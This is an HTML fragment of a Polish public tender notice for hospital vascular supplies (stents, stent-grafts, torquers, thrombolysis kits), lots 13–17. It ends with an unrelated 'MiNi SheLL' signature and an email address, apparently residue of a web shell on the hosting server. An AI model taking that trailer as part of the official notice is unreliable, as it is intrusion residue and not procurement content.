<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Stenty samorozprężalne z termiczną pamięcią kształtu do tętnic obwodowych krętych i ciasnych zwężeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości   szacunkowej  43 400,00   PLN     ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy stentów samorozprężalnych z termiczną pamięcią kształtu do tętnic obwodowych krętych i ciasnych zwężeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Stenty samorozprężalne z termiczną pamięcią kształtu dedykowanych do tętnicy podkolanowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości   szacunkowej  43 400,00   PLN     ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy stentów samorozprężalnych z termiczną pamięcią kształtu dedykowanych do tętnicy podkolanowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Stentgrafty do tętnic obwodowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   wartości   szacunkowej  10 800,00   PLN                są  sukcesywne dostawy stentgraftów do tętnic obwodowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Urządzenia skręcające ( torker ) oraz Y konektory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  o łącznej wartości szacunkowej  1 800,00 PLN              ( zamówienie podstawowe i uzupełniające ) są  sukcesywne dostawy urządzeń skręcających ( torker ) oraz Y konektorów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zestawy do trombolizy oraz systemy do usuwania ciał obcych z naczyń krwionośnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  o wartości szacunkowej  4 525,00 PLN  są  sukcesywne dostawy zestawów do trombolizy oraz systemów do usuwania ciał obcych z naczyń krwionośnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com